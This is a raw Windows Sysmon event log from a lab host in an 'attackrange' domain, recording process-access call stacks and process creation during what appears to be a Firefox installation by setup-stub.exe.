System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.989{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.989{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.521{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+8f59|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program 
Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-945A-6005-3205-00000000A301}43367056C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+a612|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.513{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startupC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000016675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 
Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.505{59A5CD1D-945A-6005-3205-00000000A301}43367056C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+8f59|C:\Program Files\Mozilla Firefox\firefox.exe+10f9|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.474{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.474{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla 
Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll+2965(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\System.dll+17cd(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+20c0|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8 154100x800000000000000016667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:54.480{59A5CD1D-945A-6005-3205-00000000A301}4336C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startupC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe.\setup-stub.exe 10341000x800000000000000016666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
